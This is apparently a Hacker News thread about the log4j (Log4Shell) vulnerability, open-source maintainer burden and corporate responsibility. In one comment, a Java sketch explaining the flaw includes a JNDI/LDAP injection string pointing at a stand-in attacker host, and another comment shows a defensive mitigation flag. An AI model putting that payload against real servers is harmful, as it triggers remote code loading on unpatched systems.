The myth of the hero maintainer must die.

Binging Netflix on your free time is completely acceptable, EVEN if the package has an RCE vulnerability. And most maintainers of popular projects will agree with that.


Easy for you does not mean easy for others. If you think boundaries are easy for everybody, go read Reddit's AITA, where you will find a flood of people who struggle with it, generally because important figures in their lives train them not to have boundaries: https://www.reddit.com/r/AmItheAsshole/

I'm glad it's easy for you. But therapists can spend years working with people on establishing and maintaining boundaries in important relationships. You can't just handwave the difficulty away. Especially when so many tech jobs discourage having a good sense of boundaries in the first place. E.g., all the startups where people are expected to be bought in to a vision of changing the world, working crazy hours. All the bosses that talk about their teams being like families. All the places that talk up commitment and loyalty and going the extra mile. Which again you can see a flood of if you care to look: https://www.reddit.com/r/antiwork/

> And most maintainers of popular projects will agree with that.

[citation needed]


You're reaching, and you're constantly misrepresenting and replying to exaggerated interpretations of my views. Unpaid OSS maintainer work is nothing like startup work, nor like the issues on antiwork. The boundaries are much easier and much more obviously necessary than in any other relationship, because direct contact is not mandatory and productive work is impossible without them. Also, even if it's impossible for one person, co-maintainers can help with those boundaries, and there are tools available for that. Of course there will be people unable to work healthily on OSS, but those people will burn out very quickly and won't be able to be long-term maintainers, period. Also, keep in mind that a large part of OSS maintainers are paid by companies to work on OSS, and they do it on company time.

I'd likewise ask for a citation of some maintainer agreeing that watching Netflix on their free time is akin to "giving the middle finger" to users. That was one of the most toxic phrases related to OSS maintainer work I've ever seen on this website, and those views should not be spread as if they were acceptable. I stand by my opinion that the "work harder" vs "watch Netflix" is a completely fabricated dichotomy, and there is a very viable middle ground available (and necessary) for everyone.


> You'd think, in the spirit of open source, these multi-billion dollar companies--like Apple and Google and Amazon--would (...) mitigate the problems.

FAANG engineer here, and one who had to work extra hours to redeploy services with the log4j vulnerability fix. I'm not sure you understand the scope and constraints of this sort of problem. Log4j's maintainers have a far more difficult and challenging job than FANGs or any other consumer of a FLOSS package, who only need to consider their own personal internal constraints, and if push comes to shove can even force backwards-incompatible changes. The priority of any company, FANG or not, is to plug their own security holes ASAP. Until that's addressed the thought of diverting resources to fix someone else's security issues doesn't even register on the radar. I mean, are you willing to spend your weekend working around the clock to fix my problems? Why do you expect others like me to do that, then? Instead I'm spending a relaxing weekend with my family with the comfort of knowing my service is safe. Why wouldn't I?


I'm not saying you, as an engineer for those companies, should be the one to donate your time and energy toward the problem. We all have competing priorities, as do the maintainers of those FLOSS packages.

I'm saying that your company's CTO, especially at a very large company, could likely identify two or three engineers who they pull into a meeting and say "reach out to these guys and get them whatever they need. Here's my cell, call me the moment you need the plane or additional resources."

Seriously, if a CTO has a budget of a few hundred million dollars and thousands of dedicated employees, how hard is it to throw a few crumbs to the open source community to change this situation from being one of a burden on a volunteer effort to, instead, one where they feel like they're in the middle of an international event where their knowledge and services are vital to keeping the internet alive?

Again, I'm exaggerating, but you see where I'm going with this. It's a missed opportunity for some seriously great PR out of a seriously bad situation.


Some time ago, I saw this suggestion from a disaster relief specialist directed towards those who want to help with disaster relief: the best thing you can do after a disaster is stay away. Taking yourself to the disaster zone very often at best consumes scarce resources from those present to manage the disaster trying to bring you up to speed and at worst creates new problems that need solving.

It's not hard to extend this to the kind of software security flaw here. If I'm a developer on a package with a critical security vulnerability that needs to be fixed now, sending me extra developers who know absolutely nothing about the code I'm working on isn't going to be helpful--it's just going to waste my time trying to bring them up to speed (or more often, telling them to just go away). If I actually need help, I'll ask the people who I know can help me; trying to sift through unsolicited help to figure out who actually has the skills to do so would take too much time.

So think hard about what help Google et al could actually be providing to help log4j here. If you have to resort to clear exaggeration to find examples... maybe that's a sign that there actually isn't all that much that they could be doing that would actually be helpful.


> So think hard about what help Google et al could actually be providing to help log4j here.

I think you make a perfectly valid point and one that shouldn't be overlooked. How about this:

"Here's $100K and an isolated penthouse suite down the road, rented for the month, where you can focus on fixing the problem and not be interrupted by screaming children. Here's a phone number if you need to delegate any specific tasks to additional teams."

Incentive to help. No added pressure. Just one practical example.


I don’t quite understand why you keep coming back to luxury apartments and private jets.

If children and family were viewed as too much of a distraction, I’m pretty sure the CTO (in this scenario) would simply choose a developer who lacks those distractions.

Let’s say the engineers chosen do have family. Why wouldn’t the company just comp a room in a local hotel?


I'm so confused. I thought we were talking about a single volunteer open source developer responsible for a vital tool, and it was too onerous to give them additional staff.


If you want to help someone, give them cash. A blank check. Not "here's what I think would be helpful and now you should arrange to use it". Not a week at a penthouse, not a butler, not a private jet. Enough cash to pay for those things if they want them.


Just ask them. "What do you need to get this done and pushed out?" Then give them what they ask for. Listen instead of talking.


It isn't quite that simple: when negotiating, it is better to give cash; when donating, it is better to give goods. Particularly if there is more than one person involved on the receiving side.

In this instance either would be reasonable.


I am not aware of a single circumstance in which donating goods is better than cash. What makes you think that?


You didn’t explain why it’s a perfectly valid point. It doesn’t seem reasonable for Johnson & Johnson, at a valuation of half a trillion dollars, to freeload. You are kind of talking about the greater good; perhaps those charitable donations should go to medical research or homeless shelters rather than reducing the burden on for-profit companies.


The valid point is that too many cooks can spoil the soup. Mythical man month, if you will. Adding people who don't have the institutional knowledge to a software project even if they are rock stars at their own companies could do more harm inadvertently when trying to fix something time critical. So the additional proposal made here acknowledges that, and instead tries to remove as many non-work distractions and discomforts as possible for the people who CAN reliably fix this fast.


For sure, but what could be done is eliminating every superfluous task so they can focus on resolving that specific problem.

Have one team handle all GitHub issues and media inquiries, and another team focus on initially evaluating all incoming pull requests to check for egregious errors or applicability.

Only after making it through the gauntlet would the original maintainers need to read and/or respond to them.

Especially when such overwhelming public attention and pressure overtakes a relatively small team like this one.


There is still a risk that the kind of time required for the maintainers to have to get those teams up to speed on the project and how it works and what needs to be done could be just as much of a distraction. Adding more triage teams might be good in the future, but for now, adding more outsiders without proper context might just add stress.

As with openssl, what needs to be done is that these volunteers need to be given cash so this is more than just a volunteer project. If a particular corporate entity doesn’t want to sponsor some of the maintainers to work on it full time, then the project needs full-time sponsorship by the Linux Foundation, ASF or under the OpenJDK.


This explains how such a “solution” benefits log4j and log4j users. The part I question from the start is why “Google should” do this, versus “Google should” pump the equivalent money into medical research, versus “Google should” make what it does better.


When there's a disaster, there will be emergency responders from other jurisdictions lined up on the state lines as the commanders call to ask if assistance is needed.


This situation is fairly urgent, but I think you might not realize just how many people a CTO at one of these companies manages. There are going to be "OSS fires" more or less constantly so "some major OSS project has a bad vuln" is not the sort of thing that gets a CTO at a company like Google or Facebook out of bed. I've only seen this happen a very few times and they were for problems that were way more serious and complex.

But that is not to say that nothing is being done. At Google, at least, there are organized efforts staffed with plenty of people that are trying to solve the much much much bigger problem of "secure all of our open source dependencies and all future dependencies" rather than the individual problem of "secure this one dependency."

And PR? Google has been running projects like OSSFuzz for years and I haven't really seen it materialize as a large amount of positive PR, even in the tech community.


> And PR? Google has been running projects like OSSFuzz for years and I haven't really seen it materialize as a large amount of positive PR, even in the tech community.

Google's Project Zero is both very helpful and gets them A LOT of PR, both tech and mainstream.


GPZ isn't oncall for urgent bugfixes and, while a truly excellent project filled with great people, isn't the core team responsible for safe imported code.


> There are going to be "OSS fires" more or less constantly so "some major OSS project has a bad vuln" is not the sort of thing that gets a CTO at a company like Google or Facebook out of bed.

If all your IT projects have an RCE vulnerability that’s relatively easy to exploit, that should keep you up at night.


The RCE existed prior to this disclosure. If I can't sleep today, why should I have been able to sleep a week ago? The dirty secret is that an absolutely enormous amount of code is vulnerable and that the solution to software security is not "fix RCEs as they are discovered as fast as possible." If having RCEs keeps you up at night, then I don't believe that there is a single engineer at almost any company in the world that interfaces with the internet that should be able to sleep.

The actual solutions here are at a more abstract layer than individual vulns.


> The RCE existed prior to this disclosure. If I can't sleep today, why should I have been able to sleep a week ago?

A week ago, this vulnerability might have been known at most to a few three-letter agencies. Today, every two-bit script kiddie will be trying to exploit it. It's not hard to see how the situation has changed.


No, the fact of having these vulnerabilities is not a problem (I mean, obviously, but at the level you describe). The problem is having them be known to the world. Especially with a level of publicity like this.


As with earlier comments this seems to oversimplify the problem of throwing people at a problem. Adding people to a project puts more pressure on the current maintainers, to authenticate, validate, train and support newcomers.

Apache has processes for this, and project maintainers pointed people in that direction repeatedly (e.g. https://github.com/apache/logging-log4j2/pull/608#issuecomme..., https://github.com/apache/logging-log4j2/pull/608#issuecomme...).

The Apache foundation receives funding from a large number of organizations already: https://www.apache.org/foundation/thanks.html

Perhaps the right question to ask here is: what did Apache do to help their members in this event?

You can ask this question of the Apache foundation independently, without adding pressure on the project maintainers at this time.


I am guessing FANG engineers (and most engineers in general) would unanimously suggest "delete this ridiculous, ill-conceived JNDI integration ASAP. If people want JNDI integration, use a custom opt-in log4j appender. Don't let this shit be enabled by default". Yet that may not sit well with the log4j folks.


Log4j taking user input to run and execute code is crazy. You don’t think it “sits well”?


This is almost laughably naive. The irony is that you are criticizing poor IT leadership, by offering a suggestion that is beyond poor.

"Let's get 3 of your best guys in touch with the guys over at log4j...."

As if you can just wire up some engineers to reach out to each other on unrelated projects and magic will happen.


Throwing new people who have never seen your project at the maintainers during a critical situation will just slow them down.

Adding random new people generally does not immediately speed up the process even in normal times, and it is actively harmful in the middle of a crisis.


> I mean, are you willing to spend your weekend working around the clock to fix my problems?

Surely the difference is you are getting paid, and if your boss says, help these guys out, you can do it? As opposed to some guys with jobs who have a project on the side. The big guys could even do something like offer to pay the maintainers and maybe they can take leave or something.

I agree with both sentiments. The big guys are under no obligation to fix an issue in some library they happen to use. But the log4j guys are under even less obligation when they do it in their spare time.

Everyone should enjoy their weekends.


> Surely the difference is you are getting paid, and if your boss says, help these guys out, you can do it?

No, I'm not getting paid. What leads you to believe that? My targets are set yearly and are very well defined, and patching random FLOSS projects is not one of them. And what leads you to believe that others, such as my boss, don't have their own milestones to meet, and instead take random FLOSS requests from random people on the internet?

A FANG is not a magical entity where any engineer can drop everything they're doing at the drop of a hat to work on external projects, let alone one whose only possible outcome is at best total indifference and at worst we get the company to own a problem affecting everyone for no reason whatsoever.


I'm not under the impression that GP means to suggest you personally have any obligation to donate time to OSS by virtue of being an employee at a large company.

Something I believe we agree on is that it is in the interest of large tech companies to spend time fixing critical security bugs in their own programs, regardless of who originally wrote the malfunctioning code and for whom said code was written.

One way to fix those bugs would be to create a patch for the external OSS library in instances where such a library is the origin of the vulnerability. This is especially practical when that library is used heavily as a basic piece of the company's common software development framework.

GP appears to be arguing that these patches should be upstreamed instead of simply being maintained internally until the bug is patched by someone else in the OSS community.


I think that what throwaway is saying, perhaps without trying to do so, is that you can't expect people in a FANG to care about the best interest of their employer, not if there are metrics set up that don't reflect the interest in question. You can't pay six-figure salaries and expect to find people without razor-sharp focus on personal gain.


I really don't understand why you are defining this as a random, external project. Your software is dependent on this project! It's right in the term "dependency"!


> A FANG is not a magical entity where any engineer can drop everything they're doing at the drop of a hat to work on external projects

If all our projects suffer from a known RCE vulnerability, I’m fairly certain my boss will be happy for me to drop everything to get it resolved.

That’s not nearly at FAANG, but it’s certainly not an undue burden on the schedule.


I’m not suggesting you donate time. I’m suggesting that if a large company depends on open source projects, it may be in their best interests to either use some engineering resources to help out those projects, i.e their engineers would do it as part of their job, or to spend their money on the maintainers of those projects.

If the big guys don’t want to do that, fair enough. But the open source maintainers are not under any obligation to work to anyones time lines either.


> You'd think, in the spirit of open source, these multi-billion dollar companies--like Apple and Google and Amazon--would (...) mitigate the problems.

Your "(...)" elides the word "help," which completely changes the meaning of the quote, and your reply is constructed uncharitably as if that word wasn't in the original statement.


Somehow, I find what you are saying here to be totally implausible.

> Log4j's maintainers have a far more difficult and challenging job than FANGs

You are saying that the companies that built advanced ML-based Chess/Go engines like Alpha Zero/Go can't solve a simple logging bug involving string substitution?

If your company ends up using the product in all your teams/project and products wouldn't it be in the company's interest to keep the product safe?

How do we know you're not a CTO/C--/manager in your 'faang' just taking this opportunity to bitch about how bad and unreliable open source is? You do have a track record when it comes to this.

> I mean, are you willing to spend your weekend working around the clock to fix my problems?

Wow, that's cynical even for a 'faang' dude.


same. my evenings and weekend are totally gone to put out this fire. which I wouldn't do if i wasn't obligated to


Speaking as an individual, of course you want to sit by the pool this weekend.

But as a professional representative of your org, surely you'll recognize the unsustainability of the situation and that it's far from ideal even in the pure self-interest of the company in question.


>> I'm still flabbergasted that the original maintainers are rushing around trying to patch these problems.

Agreed, while reading it I also disagreed at this point:

>> the maintainers of log4j would have loved to remove this bad feature long ago, but could not because of the backwards compatibility promises they are held to.

Nobody is holding them to anything. If they want to remove an old feature, go right ahead. If those using it think it's that important they can fork the project and maintain it themselves. Oh right, that would take effort or money.


> Nobody is holding them to anything

I don't get this argument. Part of sharing your work is making sure what you put out is actually helpful to people. If they remove features people really like, then the library won't be as helpful - so it's perfectly fine for the OG devs to maintain this feature. The same thing with "scrambling" to fix - that could be because a sword is hanging over your head, or because you care about the people who use your work. Thinking this way, I can perfectly see them working hard to fixing this bug.


It is still a choice you make: do you want to be nice and do everything anyone asks of you? Or stick to your principles and build only what you think is right?

Developers are social creatures like anyone else and like validation and recognition from peers, that is understandable but not an excuse.

It is no different from being able to say no when your boss ask you to build something you don't believe in or is against your morals, it is tough but our choice nonetheless.

Their choice then to support this feature, and now to patch it. They could have said no either time; no point in complaining about it after making the choice.


>> Part of sharing your work is making sure what you put out is actually helpful to people.

No, people get to decide for themselves what is helpful to them. Assuming developers want to make the best tool they can, they still have to do so within the resource constraints they have. Dropping a feature or ignoring requests is part of that.


I understand it perfectly. Log4j is used in many Enterprise systems. Java is a fairly conservative language. Combine both together and you get much hesitancy to break backwards compatibility ingrained in the Java world.


Why not turn it off by default and feature flag it with an env variable?
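For what it's worth, 2.10 through 2.14.x do ship an opt-out flag for message lookups, settable either way (the `app.jar` here is a hypothetical deployment):

```shell
# Disable log4j2 message lookups (versions 2.10-2.14.x) without code changes.
# As a JVM system property:
#   java -Dlog4j2.formatMsgNoLookups=true -jar app.jar
# Or as an environment variable picked up at startup:
export LOG4J_FORMAT_MSG_NO_LOOKUPS=true
echo "LOG4J_FORMAT_MSG_NO_LOOKUPS=$LOG4J_FORMAT_MSG_NO_LOOKUPS"
```

It just wasn't the default until 2.15 flipped it.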


Did they want to remove it because of security concerns?

If so, I really wouldn’t hold someone to any backwards compatibility promise if security is a concern.


My favorite way to dissect any open source issues:

How much did you pay for it? Money-back guarantee: if you paid $0, then you are guaranteed to get $0 back in the case of an issue.


Are data breaches actually treated as all that seriously? For all the talk about cyber security, there seems to generally be little investment. It appears to be viewed as more of a reputational concern than an operational one.

A past organization of mine had a data breach (the kind that ended up making the news everywhere). A few people left (probably making it worse with all the turnover there), but I would be surprised if anything really changed in that organization.


If the company is in healthcare or finance, yes. Otherwise the typical answer is no. Most companies just load up on cyber insurance and call it a day. That said, reputational concern, is a big thing for companies. Take Dropbox for example. Early on they suffered several security breaches, and had a bad reputation around security. They've since built out a fairly large security program, in part because bad security can block deals, especially in the enterprise space.

I'll note that there's been more investment in security the last 4-5 years. Most B2B companies do a SOC2, and early on, so there tends to be a baseline of competence.


A data breach isn't the primary concern here. This exploit allows full pwnage of a system and could take down entire networks for as long as it takes to rebuild them.


This is not really about data breaches. The first widely spread automated attacks seem to drop cryptominers; however, we should expect that (if it hasn't already happened) within a week or so this will get used as the entry point for ransomware attacks, since it gives attackers a solid way of getting code execution on the servers of anyone who has not patched this issue.


> I'm still flabbergasted that the original maintainers are rushing around trying to patch these problems.

If the RCE had been responsibly disclosed instead of via tweets and PR comments, maybe there wouldn't have had to be so much scrambling. And indeed maybe ASF could have found corporate OSPOs to help with remediation.

There are lots of pixels being spilled on how the users of open source software should be paying for it (?), but I haven't seen much criticism of the vulnerability not being responsibly disclosed.


to the best of my knowledge it was discovered via a minecraft exploit and I don't think minecraft players are generally the "responsible disclosure" kinda people.


TBH it’s also quite mind boggling that this level of an RCE was used to hack Minecraft servers of all things.

I wonder if this wasn’t intended for something bigger and they just got caught when testing this out in the field.


Minecraft servers were one part of it... Minecraft clients where another.

If you sent a message to everyone with a client (that logged that message), everyone with a client would at least ping back to the ldap server.

The issue where this was introduced was: https://issues.apache.org/jira/browse/LOG4J2-313

That's from 2013 (Minecraft was 2 years old then). On the other hand, nothing really happened with it until someone asked if it was a security vulnerability - https://github.com/apache/logging-log4j2/pull/608#issuecomme...

And then all hell broke loose.

Simply said, this was a feature that was intended to make it easier for one company to use their structure with ldap lookups for where/how to log. The author of the change did what many people encourage others to do when working with open source "here's some code that I wrote, I'm contributing it back upstream."

If this was part of something "bigger", it sat quiet for the better part of a decade.
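To make the mechanics concrete, here's a toy sketch (all names are mine, not log4j's) of the substitution step that made this exploitable: the formatter re-scans the rendered message for ${...} tokens, so user input that merely gets logged reaches the resolver. In the real CVE the resolver for jndi: keys performed an actual JNDI/LDAP fetch; the stub below only records that it would have.

```java
import java.util.function.Function;

public class LookupSketch {
    // Stand-in for a log4j-style string substitutor: every ${...} token
    // found in the rendered message is handed to a resolver.
    static String interpolate(String msg, Function<String, String> resolver) {
        StringBuilder out = new StringBuilder();
        int i = 0;
        while (i < msg.length()) {
            int start = msg.indexOf("${", i);
            if (start < 0) { out.append(msg.substring(i)); break; }
            int end = msg.indexOf('}', start);
            if (end < 0) { out.append(msg.substring(i)); break; }
            out.append(msg, i, start);
            out.append(resolver.apply(msg.substring(start + 2, end)));
            i = end + 1;
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // A chat message like this, merely logged, reaches the resolver.
        String chat = "hello ${jndi:ldap://attacker.example/a}";
        String rendered = interpolate(chat, key ->
                key.startsWith("jndi:")
                        ? "<would contact " + key.substring(5) + ">"
                        : key);
        System.out.println(rendered);
    }
}
```

The point is that the trigger is the log call itself, no special API misuse required, which is why a chat message to a Minecraft client was enough.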


Wow, that’s a scary read…

No consideration, no discussion, no security analysis, just "JNDI is cool, can I hav plz? Ofc!"

Did none of these people consider what JNDI is designed to do?

Did none of these people consider what side-effects are appropriate within a logging library?


Yes... but... realize that log4j2 was in beta releases at the time, being maintained by one developer as part of an "I want to redesign how it works" effort.

As an open source developer working on a project that hadn't even been formally released, I'd be quite pleased to have someone else contributing the features that they found useful back upstream in an effort to make it a better project.

Yes, this is what jndi is supposed to do. Was it done as best as it could be? Probably not. But it isn't something that's only in log4j2

http://logback.qos.ch/manual/loggingSeparation.html#ContextJ...

https://dennis-xlc.gitbooks.io/the-logback-manual/content/en...

But I'm not going to fault a solo developer of some beta software in the world of 2013 for not rejecting a patch because every angle wasn't thought out.


Considering that Minecraft players have built functional computers in-game using redstone circuits, it's not surprising to me at all. Minecraft tends to attract folks who have an eye for detail, and a passion for figuring out how things work (a.k.a. hacking).


Or they didn't know what they had. People spend a surprisingly large amount of time trying to cheat at video games. They could have stumbled onto it in this context without realizing the much larger picture.


yeah it's nuts. I wonder what the upper limit on a responsible disclosure bug bounty would have been (of course, who would pay that is the question, because it's an open-source project with a few maintainers) vs. the nation-state or underground price. This has been described as a once-in-a-decade RCE.


A huge demographic plays Minecraft. Kind of silly to make a generalization like that.


There’s no hiding something this easily exploitable. This isn’t rowhammer or spectre where you need a degree to understand it. Copy and paste this in and that’s it. It would have never survived “responsible disclosure”


From my reading of it, it was (12 days ago) "here's a pull request to remove a feature." And for a bit over a week it went through the normal process and got merged into the code 7 days ago.

Then three days ago someone asked "Is it a security vulnerability" and then everything happened.

This wasn't any great "there's a security bug that needs to be patched yesterday" followed by a fix and release, but rather only after the fact, when looking at it, was the scope of the issue realized.


I'm not sure about Amazon, but Google's Project Zero and OSS-Fuzz teams seem to be doing a lot of good work when it comes to open-source security -- more would always be nice

Personally I'd like something like a security health card/metric on open-source libraries that we could tie into CI systems/pull requests or something

in the past there were so few libraries it wasn't as daunting

I'd be able to reason about stuff like libpng, libttf, etc. and think about them or even support them, but now some projects are massive hodgepodges of thousands upon thousands of packages


I know you're deliberately exaggerating, but isn't it a little bit over the top?

That ("...private jets..") doesn't happen because the solution isn't exactly the hard part, and the unpaid original maintainers are doing them anyway.


I admit to a certain level of exaggeration but, at the same time, we are talking literal peanuts to a large company. They could spend a million dollars and it'd be a rounding error on their balance sheet.

In all seriousness, taking actions like I identified above would cost the companies virtually nothing but result in huge long-term benefits by signaling to the rest of the open source world that "we love your work and will be right beside you helping if the chips are down."

This is, of course, not a suitable compensation model for popular open source projects. That's a separate conversation.

But it would at least be something.


The compensation model is the problem. It doesn't mesh well with the way corporations function. If you don't charge for your product or services, corporations have no standard mechanism for addressing that some other way.

Open source contracts essentially state that companies can use the product with no relevant obligations, so they do. The "huge long term benefit" you claim can't be reliably translated onto a balance sheet, so it isn't.

And when companies do get involved, it's often explicitly for their direct commercial benefit, like Amazon's ElasticSearch distribution.

There's also a race to the bottom aspect to it. If an open source package e.g. charges for commercial use, something more free is likely to replace it.


> The compensation model is the problem. It doesn't mesh well with the way corporations function. If you don't charge for your product or services, corporations have no standard mechanism for addressing that some other way.

FSF: Pardon me, here's a little process that encourages sharing so that everyone can...

Corporations: gnawing on a giant proprietary turkey leg Doesn't Mesh Well nom nom nom No Standard Mechanism nom nom nom

**

Corporations: yelling through a mouthful of turkey What in sam hell is Linux why does IBM have a billboard about Linux why don't we have Linux?

Underling: Sir that's open source, our standard licensing mechanism wouldn't...

Corporations: belching through a mouthful of turkey change the goddamned mechanism I want linux and pass me that mayo


> Pardon me, here's a little process that encourages sharing

But they're following the process. What the comment I replied to was saying was that they should go beyond it. I'm pointing out that the lack of standard processes for doing that is what prevents it from happening.

That's just the reality of the situation. Yelling at clouds isn't going to change that.


> I admit to a certain level of exaggeration but, at the same time, we are talking literal peanuts to a large company.

I'm not sure you understand what you are asking, and I'm kind of dumbfounded by the sense of entitlement of your request. You are expecting others like me to be forced to work weekends on a problem that doesn't concern me (because my service is already patched) for absolutely nothing in return, and instead risking owning a problem and the blame of not coming up with a one-size-fits-all magic bullet.

All downsides and absolutely no upside at all, for my employer and let alone for myself.

Let me ask you this: how much of your personal time did you invest in coming up with a fix for this vulnerability? And yet you feel entitled to demand this from others?


You do realize that this issue wasn't discovered this morning, and indeed part of the point is that if it hadn't been left to people working in their spare time, it could've been patched days ago, and you could've fixed all your services during the week? So you prefer working weekends to fix a delayed bug instead of devs being paid to help fix it for everybody during the working week?


> Usually (as per ASF rules) the team should wait 72 hours after creating a release candidate before publishing the release to give the community enough time to review and cast their votes. We are building consensus to shorten that window for this particular release, given its urgency.

from: https://github.com/apache/logging-log4j2/pull/608#issuecomme...

If you read more of the history of the release you'll find that additional vectors were found in the RC process that were also fixed.


if this was a difficult task to fix, maybe support to ensure the devs can properly focus on the task would be a valid thing. however, this sounded like something not very difficult to fix. it will take longer for all of the end users to deploy fixes in their envs than it took for the patch to become available.

molehill meet mountain.


This commentary is exactly the problematic commentary the authors were referring to in the quote that David included near the top of his article. You may not be being so directly brash about their state, but you still imply with added dramatic extension that the project is in some dire state. That's likely a significant overreaction. There's a feature in the project that leads to a security concern, making it fixable likely took a small number of hours, communicating and dealing with the drama is what has and would continue to take the time, as well as pushing back on a plethora of demands for "full review" or "you must travel outside of your home country so I feel comfortable again".

I poked some fun at the issue, because this is in many ways an amusing issue - a feature that would rarely be added in more recent times, but at the time it was introduced we as an industry considered the whole space differently. I'm sure the maintainers are having a tough time, and theres no need to point fingers at them, hell there's no need to point fingers at the implementor of the feature. It's a mistake in retrospect but that doesn't make anyone unworthy of respect.

The actions you identified make a lot of assumptions; some are exclusionary, some are potentially offensive:

- not everyone lives in the same country

- not everyone can travel on a whim

- the developers don't need to be close to you or their customers unless they want to be

- the project is not in some dire state in need of "saving"

As an Apache project there is a foundation that can help organize funding, and so if there's a funding problem with the project the discussion should start there. Yes, open source at large is underfunded, but this isn't a standalone project on a personal git host. Apache has some (probably not enough) funding, but most importantly it has the industry contacts and relationships to do better here.

There's a problem with "doing better" though, which I rarely see come up in these conversations. There are lots of libraries, such as log4j, that don't necessarily need full time staff or full time funding. They need spurts of funding at key times, to handle the trickle of regular but infrequent patches, to roll releases periodically, and occasionally such as this to dedicate some significant time to handling an exceptionally rare event. What this requires, in my opinion, more than arbitrary dollars, is a slush fund of professional time sponsorship, for employers of key contributors to be ready to make space available during work hours for this work, without adding any more pressure to the situation. Depending on the situation this may or may not require additional funding, but for a healthy ecosystem finding ways to arrange for this, and helping employers be comfortable with it is the step necessary to address the wide scale problem of small to mid size projects burning people's personal time in unplanned ways.


If I misspoke or offended anyone it was certainly not intentional. The bulk of my comment was based on the linked tweet:

> "Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people to bash us, for work we aren't paid for..."

I guess that sounded to me like a very small group of isolated volunteers struggling to handle a lot of press and attention along with demands from numerous loud users. I thought perhaps they could have benefited from having some additional support.

My apologies if I unintentionally offended.


I don't think that throwing a bunch of new people in a project will necessarily make dealing with the problem (code, doc, communication issues) less stressful for the maintainers involved.

Quite the opposite.

The only way you can make this be less stressful for the maintainers is for them to delegate it all to some corporation to handle and go shopping, but this effectively means they are no longer the maintainers of that project.

Surely there is the possibility that these million dollars are just donated to the maintainers as compensation for a prompt resolution, but I don't think that is so easy to pull off. A CTO may have some staffing, but paying large sums to external contractors on short notice is not easy in any large organization.

No. I think this whole line of reasoning doesn't resonate much with reality.


> No. I think this whole line of reasoning doesn't resonate much with reality.

Oddly enough, I hear the same thing from my boss all the time.


For argument’s sake, at least, I don’t consider anything suggested here as definitively “over-the-top”. It may seem (or be) unrealistic in practice (for reasons I don’t know), but the suggestion is far from unconscionable— it may, in fact, be the lowest cost solution to what could cost mega-corps billions in current (and potential future) fines/liabilities. To the extent it sounds like an exaggeration, I think that embodies the point of the comment— there are some (almost unreconcilable) concerns that impact the interplay of corporations and open source development.


As you said, the solution isn't the hard part. The reason that large companies aren't deploying their own solutions for this issue isn't that their engineers are incapable of developing them, but that they would then have to carry that patch forever, and if a problem was found with their particular solution they would be on the hook for it.

And yes, I do think this, "but everyone else is doing the same thing so it isn't really our fault" attitude is a problem.


> You'd think, in the spirit of open source, these multi-billion dollar companies--like Apple and Google and Amazon--would recognize the danger and immediately divert the best engineers they had to help this team identify and mitigate the problems.

Google doesn't even use log4j. What are you talking about? The spirit of open source does not dictate that the richest companies automatically shoulder the burden of maintenance of projects they do not even use. Google already has initiatives like Summer of Code that help open source projects it does not use, and I think it's perfectly fine to draw the line there.

> divert the best engineers they had

So the lessons from the mythical man-month are forgotten here. At this point I don't think adding more manpower helps.


Google Voice was vulnerable to this, so I think that means they use log4j somewhere, but I'm not an expert.


The Android SDK depends on log4j, so they definitely do use it.


What? It was already fixed. You just need to update. There's no need for the world's top fintech programmers to hack it out on a mountaintop somewhere.

Also, the reason the maintainers are rushing to fix it is: they're worried about losing "market share". Having been in open-source circles for a long time, maintainers care GREATLY about how many users they have. They just like watching their download stats go up every year. Even if it brings them no financial rewards. It's a sort of addiction.


> maintainers care GREATLY about how many users they have.

They do. Until they don't.

That inevitable day when they get yelled at in a github issue thread by a user who didn't bother reading the documentation, while staring at their kid in the living room playing video games and start wondering to themselves "why am I doing this hobby in my spare time again?"

Mild dopamine hits to affirmation-addicted programmers is not the sturdiest foundation upon which to build enterprise-grade software libraries.


Partly it is because it looks good on the resume, improves job prospects, helps build a consulting business, or gets you keynote offers, book deals, etc.

Many serious contributors eye all these avenues to leverage their popularity; it is not just affirmation, it is also the ability to monetize it.


An influx of pull requests is equally difficult for open source projects.

Anything sufficiently at scale needs a set of maintainers that the commercial tech companies would then collaborate with to get the PRs going.

Otherwise if everyone's just panicking and rushing to submit PRs, they'll inundate the maintainer. There's also no guarantee that even the best engineers at these companies are intimately familiar with the project, and might introduce regressions or other vulnerabilities in the process.

Anyway I do agree companies should be working with OSS devs, but it shouldn't be rushed or knee jerk. It should be collaborative and measured.


Great comment. I think this speaks to overall what’s happening in the world today.


> You'd think...these multi-billion dollar companies...would recognize the danger and immediately divert the best engineers they had to help this team identify and mitigate the problems.

For the general case, the problem is that a reporter might report the vulnerability to the open source project, then the project needs to keep it a secret while they make a fix. There isn't a great way to leverage these stakeholders. It's obviously different for something like Android that is open source, but clearly Google.


> They should have been buried in useful pull requests.

Drive-by pull requests during a highly visibile emergency are rarely useful.


True, but that thoughtfulness is not what is stopping major companies from contributing, is it?


This is a problem in open source: everybody wants the fruits of labor without paying for it. The log4j vulnerability is what happens when you don't pay for it.


That's right. It is open source and, when it breaks, you get to keep both pieces.


but being open source, you can pull out the crazy glue and stick them back together. if you feel generous, you can submit your crazy glue solution to the devs. if they like it, they can then make it part of the package.


On the other hand, I expect that most people running log4j didn't know about or want this feature. Why should they pay for something they don't want?

Maybe it makes more sense to fund system-wide efforts?


That's why I don't contribute to open source that is used by big corps. I don't like the idea of working for free for the benefit of billionaires.


You give away your work with a price tag of $0. So people/companies pay $0 for it. What’s hard to understand about that?


> What does backwards compatibility mean to me?

> I want to not spend much time upgrading a dependency

> Go compatibility promise:

>So whenever a change in behavior happens in an upstream library

You are comparing a promise from language designers to no promise from the library developers. Syntax from Oak (before Java was called Java) still compiles and works in Java 17 right now:

    jshell
    |  Welcome to JShell -- Version 17
    |  For an introduction type: /help intro
    jshell> public abstract interface I {}
    |  created interface I

You can still type it (public abstract interface - all interfaces have been abstract by default since Java 1) and it works. One of the reasons I gave up on writing desktop applications in Go was that libraries were breaking compatibility with every commit. The GTK+ binding was unusable, as before gomod it would break literally, and I mean literally, every day.

Please tell me that no Go library has had any breaking changes in the last 5 years and I'll make it my default ecosystem starting tomorrow.


What do you write desktop applications in these days?


To add some perspective, log4j has gone for 20 years with only two major versions. Assuming that they are following semantic versioning, that means they added new features/fixes in a backwards-compatible way and only broke compatibility _once_ in over two decades. That's both a testament to the stability of the library over time and a reminder that all the cruft accumulated over the years at most gets gated off through saner defaults.


Semantic versioning itself is substantially younger than 20 years.


Semantic versioning and similar variations were in use long before the term was coined.


